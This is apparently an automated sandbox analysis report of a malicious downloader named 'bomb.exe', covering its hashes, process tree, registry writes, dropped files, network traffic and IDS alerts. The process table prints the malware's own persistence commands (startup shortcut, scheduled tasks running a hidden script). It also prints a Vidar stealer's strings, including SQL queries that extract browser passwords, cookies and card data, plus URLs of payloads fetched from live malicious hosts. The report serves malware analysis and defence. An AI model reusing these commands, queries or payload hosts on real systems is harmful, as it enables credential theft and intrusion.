| File name: | bomb.exe |
| Full analysis: | https://app.any.run/tasks/f8173040-82ef-496a-9f8d-df9df5362fc6 |
| Verdict: | Malicious activity |
| Threats: | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
| Analysis date: | August 31, 2024, 09:34:14 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5: | 55DBA6E7AA4E8CC73415F4E3F9F6BDAE |
| SHA1: | 87C9F29D58F57A5E025061D389BE2655EE879D5D |
| SHA256: | 3CEA805F1396DF15BDBCD4317388A046A41A6079DBA04576A58BA7B2C812338A |
| SSDEEP: | 192:HLmmmmlmtYz0wZick7pDMj4GbCrMz+MCZLa7HhdSbwxz1OLU87glpp/bI6J4yfm4:pmi7k7pMiLLaLhM6OLU870NJqoI |
| .exe | | | Generic CIL Executable (.NET, Mono, etc.) (82.9) |
|---|---|---|
| .dll | | | Win32 Dynamic Link Library (generic) (7.4) |
| .exe | | | Win32 Executable (generic) (5.1) |
| .exe | | | Generic Win/DOS Executable (2.2) |
| .exe | | | DOS Executable Generic (2.2) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2048:07:19 19:03:26+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32 |
| LinkerVersion: | 48 |
| CodeSize: | 9728 |
| InitializedDataSize: | 2048 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x457a |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
| FileVersionNumber: | 1.0.0.0 |
| ProductVersionNumber: | 1.0.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| Comments: | - |
| CompanyName: | - |
| FileDescription: | - |
| FileVersion: | 1.0.0.0 |
| InternalName: | bomb.exe |
| LegalCopyright: | - |
| LegalTrademarks: | - |
| OriginalFileName: | bomb.exe |
| ProductName: | - |
| ProductVersion: | 1.0.0.0 |
| AssemblyVersion: | 1.0.0.0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 184 | cmd /c copy /b ..\Rt + ..\Core + ..\Created + ..\Reg + ..\Aa + ..\Toe + ..\Interested + ..\Opera + ..\Instant + ..\Findings + ..\Gave + ..\Hk + ..\Pollution m | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 348 | cmd /k echo [InternetShortcut] > "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduVistaR.url" & echo URL="C:\Users\admin\AppData\Local\LearnTech Vista Co\EduVistaR.js" >> "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduVistaR.url" & exit | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 400 | net stop WmiAppSrv | C:\Windows\System32\net.exe | — | httphi.admini.website8c64.exe.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 444 | C:\Users\admin\sysmysldrv.exe | C:\Users\admin\sysmysldrv.exe | http185.215.113.66newtpp.exe.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
| |||||||||||||||
| 448 | "C:\Users\admin\Desktop\http54.189.150.242302MeMpEng.exe.exe" | C:\Windows\System32\svchost.exe | — | http54.189.150.242302MeMpEng.exe.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 580 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | http147.45.44.104prog66d1e3d3208e9_vfdw12.exe#d12.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Assembly Registration Utility Version: 4.8.3761.0 built by: NET48REL1 Modules
Vidar(PID) Process(580) RegAsm.exe C2https://t.me/iyigunl URLhttps://steamcommunity.com/profiles/76561199761128941 Strings (239)INSERT_KEY_HERE lstrcpyA GetEnvironmentVariableA GdipSaveImageToStream History runas ssfn* GetProcAddress lstrcatA OpenEventA CloseHandle Sleep GetUserDefaultLangID VirtualAllocExNuma VirtualFree GetSystemInfo HeapAlloc GetComputerNameA GetProcessHeap GetCurrentProcess lstrlenA ExitProcess GlobalMemoryStatusEx GetSystemTime SystemTimeToFileTime gdi32.dll user32.dll crypt32.dll ntdll.dll CreateDCA GetDeviceCaps ReleaseDC CryptStringToBinaryA sscanf NtQueryInformationProcess HAL9TH JohnDoe DISPLAY %hu/%hu/%hu GetFileAttributesA GlobalLock GlobalSize CreateToolhelp32Snapshot IsWow64Process Process32Next GetLocalTime GetTimeZoneInformation GetSystemPowerStatus GetVolumeInformationA Process32First GetLocaleInfoA GetUserDefaultLocaleName GetModuleFileNameA FindNextFileA SetEnvironmentVariableA LocalAlloc GetFileSizeEx SetFilePointer FindFirstFileA VirtualProtect GetLogicalProcessorInformationEx GetLastError MultiByteToWideChar GlobalFree WideCharToMultiByte TerminateProcess GetCurrentProcessId rstrtmgr.dll CreateCompatibleBitmap SelectObject BitBlt DeleteObject CreateCompatibleDC GdipGetImageEncodersSize GdipGetImageEncoders GdipCreateBitmapFromHBITMA GdiplusStartup GdiplusShutdown GdipDisposeImage GetHGlobalFromStream CreateStreamOnHGlobal CoUninitialize CoInitialize CoCreateInstance BCryptGenerateSymmetricKey BCryptCloseAlgorithmProvider BCryptDecrypt BCryptSetProperty BCryptDestroyKey BCryptOpenAlgorithmProvider GetWindowRect GetDesktopWindow GetDC EnumDisplayDevicesA GetKeyboardLayoutList CharToOemW RegQueryValueExA RegEnumKeyExA RegOpenKeyExA RegEnumValueA CryptBinaryToStringA CryptUnprotectData SHGetFolderPathA InternetOpenUrlA InternetConnectA InternetCloseHandle InternetOpenA HttpSendRequestA HttpOpenRequestA InternetReadFile InternetCrackUrlA StrStrA PathMatchSpecA GetModuleFileNameExA RmStartSession RmRegisterResources RmEndSession sqlite3_open sqlite3_prepare_v2 sqlite3_step sqlite3_column_text sqlite3_finalize sqlite3_close sqlite3_column_bytes sqlite3_column_blob encrypted_key PATH C:\ProgramData\nss3.dll NSS_Shutdown PK11_GetInternalKeySlot PK11_FreeSlot PK11_Authenticate PK11SDR_Decrypt C:\ProgramData\ SELECT origin_url, username_value, password_value FROM logins Soft: Host: Login: Password: Opera OperaGX Network Cookies .txt TRUE FALSE SELECT name, value FROM autofill History SELECT url FROM urls LIMIT 1000 CC SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards Name: Month: Year: Card: Cookies Login Data formSubmitURL usernameField encryptedUsername encryptedPassword guid SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies SELECT fieldname, value FROM moz_formhistory SELECT url FROM moz_places LIMIT 1000 cookies.sqlite formhistory.sqlite places.sqlite Plugins Local Extension Settings Sync Extension Settings Opera Stable Opera GX Stable CURRENT chrome-extension_ _0.indexeddb.leveldb profiles.ini chrome opera firefox Wallets %08lX%04lX%lu SOFTWARE\Microsoft\Windows NT\CurrentVersion x64 %d/%d/%d %d:%d:%d HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall DisplayVersion msvcp140.dll softokn3.dll vcruntime140.dll \Temp\ .exe open %LOCALAPPDATA% %USERPROFILE% %PROGRAMFILES% %PROGRAMFILES_86% *.lnk Files \Local Storage\leveldb\CURRENT \Local Storage\leveldb \Telegram Desktop\ D877F783D5D3EF8C* map* A7FDF864FBC10B77* A92DAA6EA6F891F2* F8806DD0C461824F* Tox *.tox *.ini Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375 Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\ Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\ Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\ Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\ \Outlook\accounts.txt Pidgin accounts.xml token: Software\Valve\Steam config.vdf DialogConfig.vdf DialogConfigOverlay*.vdf libraryfolders.vdf loginusers.vdf \Steam\ \Discord\tokens.txt /c timeout /t 5 & del /f /q " " & del "C:\ProgramData\*.dll"" & exit C:\Windows\system32\cmd.exe Content-Type: multipart/form-data; boundary=---- Content-Disposition: form-data; name=" build token message ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 screenshot.jpg | |||||||||||||||
| 648 | "C:\Users\admin\Desktop\http147.45.44.104malesa66d1b7f7f3765_Front.exe.exe" | C:\Users\admin\Desktop\http147.45.44.104malesa66d1b7f7f3765_Front.exe.exe | — | bomb.exe | |||||||||||
User: admin Company: Shenzhen Aidapu Network Technology Co.,Ltd. Integrity Level: MEDIUM Description: FrontSketch 1.4 Exit code: 2 Version: 3.15.002.0 Modules
| |||||||||||||||
| 660 | cmd /c schtasks.exe /create /tn "Pharmaceutical" /tr "wscript //B 'C:\Users\admin\AppData\Local\LearnTech Vista Co\EduVistaR.js'" /sc minute /mo 5 /F | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 680 | /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe" | C:\Windows\System32\schtasks.exe | — | GDBFCGIIIJ.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 828 | findstr /I "wrsa opssvc" | C:\Windows\System32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASMANCS |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (2396) bomb.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\bomb_RASMANCS |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2396 | bomb.exe | C:\Users\admin\Desktop\http8.134.12.90feishu_update.exe.exe | executable | |
MD5:1B8F93F22F2AEE44C16F9886B44549B8 | SHA256:25333E6A6F1AD7C3AEE8B2D61919176542A8FD0050F72DC7D411448C8C3426F3 | |||
| 2396 | bomb.exe | C:\Users\admin\Desktop\http185.215.113.66pei.exe.exe | executable | |
MD5:8D8E6C7952A9DC7C0C73911C4DBC5518 | SHA256:FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278 | |||
| 1060 | svchost.exe | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\Cab68D7.tmp | compressed | |
MD5:1BFE591A4FE3D91B03CDF26EAACD8F89 | SHA256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8 | |||
| 2396 | bomb.exe | C:\Users\admin\Desktop\http147.45.44.104revada66d2b5c78630c_crypted.exe#1.exe | executable | |
MD5:AE9DE1093D87672C550524299E8DF649 | SHA256:37F45ABE9970C5962B441635AB1DF0395DE570AA7ADE2617FB18BED6A0F0C138 | |||
| 3284 | RegAsm.exe | C:\Users\admin\AppData\Local\Temp\Tmp66D1.tmp | der | |
MD5:1420D30F964EAC2C85B2CCFE968EEBCE | SHA256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9 | |||
| 3356 | http185.215.113.66newtpp.exe.exe | C:\Users\admin\sysmysldrv.exe | executable | |
MD5:BE9388B42333B3D4E163B0ACE699897B | SHA256:D281E0A0F1E1073F2D290A7EB1F77BED4C210DBF83A0F4F4E22073F50FAA843F | |||
| 1060 | svchost.exe | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\Tar68D8.tmp | binary | |
MD5:78785956AB4E54D6116D673C3491EDFF | SHA256:C514DBDBB13632CBB378C59086C1EBB0BC9B25FFB0A349F2B052B065C0D913E6 | |||
| 3284 | RegAsm.exe | C:\Users\admin\AppData\Local\Temp\Tmp66E2.tmp | der | |
MD5:1420D30F964EAC2C85B2CCFE968EEBCE | SHA256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9 | |||
| 3284 | RegAsm.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\76b53b3ec448f7ccdda2063b15d2bfc3_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | |
MD5:BBC8DA7D36DF3F91C460984C2ABE8419 | SHA256:0399CCF5E780949A63400736A46CCE7D1879903D0F45C6B7D194C960BA4DDDC2 | |||
| 2396 | bomb.exe | C:\Users\admin\Desktop\http185.215.113.66newtpp.exe.exe | executable | |
MD5:BE9388B42333B3D4E163B0ACE699897B | SHA256:D281E0A0F1E1073F2D290A7EB1F77BED4C210DBF83A0F4F4E22073F50FAA843F | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2396 | bomb.exe | GET | 200 | 147.45.44.104:80 | http://147.45.44.104/revada/66d2b5c78630c_crypted.exe | unknown | — | — | suspicious |
2396 | bomb.exe | GET | 200 | 185.215.113.66:80 | http://185.215.113.66/newtpp.exe | unknown | — | — | unknown |
2396 | bomb.exe | GET | — | 185.215.113.66:80 | http://185.215.113.66/pei.exe | unknown | — | — | unknown |
2396 | bomb.exe | GET | 200 | 8.134.12.90:80 | http://8.134.12.90/feishu_update.exe | unknown | — | — | unknown |
2396 | bomb.exe | GET | 404 | 8.134.12.90:80 | http://8.134.12.90/%E6%94%BE%E5%81%87%E5%80%BC%E7%8F%AD%E5%AE%89%E6%8E%92.exe%0D | unknown | — | — | unknown |
2396 | bomb.exe | GET | — | 147.45.44.104:80 | http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe | unknown | — | — | suspicious |
2396 | bomb.exe | GET | 200 | 124.220.48.147:80 | http://124.220.48.147/Kas.exe | unknown | — | — | unknown |
2396 | bomb.exe | GET | 200 | 124.220.48.147:80 | http://124.220.48.147/Kasp.exe | unknown | — | — | unknown |
2396 | bomb.exe | GET | 404 | 154.216.17.178:80 | http://154.216.17.178/edge/msconfig32.exe | unknown | — | — | unknown |
1372 | svchost.exe | GET | 304 | 23.50.131.216:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?33775f6043c93e33 | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 239.255.255.250:3702 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1372 | svchost.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1060 | svchost.exe | 224.0.0.252:5355 | — | — | — | whitelisted |
2396 | bomb.exe | 151.101.130.49:443 | urlhaus.abuse.ch | FASTLY | US | whitelisted |
2396 | bomb.exe | 185.215.113.66:80 | twizt.net | 1337team Limited | SC | unknown |
2396 | bomb.exe | 147.45.44.104:80 | — | OOO FREEnet Group | RU | malicious |
2396 | bomb.exe | 5.9.166.97:443 | appload.icu | Hetzner Online GmbH | DE | unknown |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
urlhaus.abuse.ch |
| whitelisted |
www.clikapps.icu |
| unknown |
appload.icu |
| unknown |
www.appload.icu |
| unknown |
clikapps.icu |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
1060 | svchost.exe | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .icu Domain |
2396 | bomb.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
2396 | bomb.exe | A Network Trojan was detected | ET HUNTING Download Request Containing Suspicious Filename - Crypted |
2396 | bomb.exe | Potentially Bad Traffic | ET INFO Suspicious Domain (*.icu) in TLS SNI |
2396 | bomb.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2396 | bomb.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2396 | bomb.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 33 |
2396 | bomb.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 23 |
2396 | bomb.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
2396 | bomb.exe | Potentially Bad Traffic | ET HUNTING Observed Let's Encrypt Certificate for Suspicious TLD (.icu) |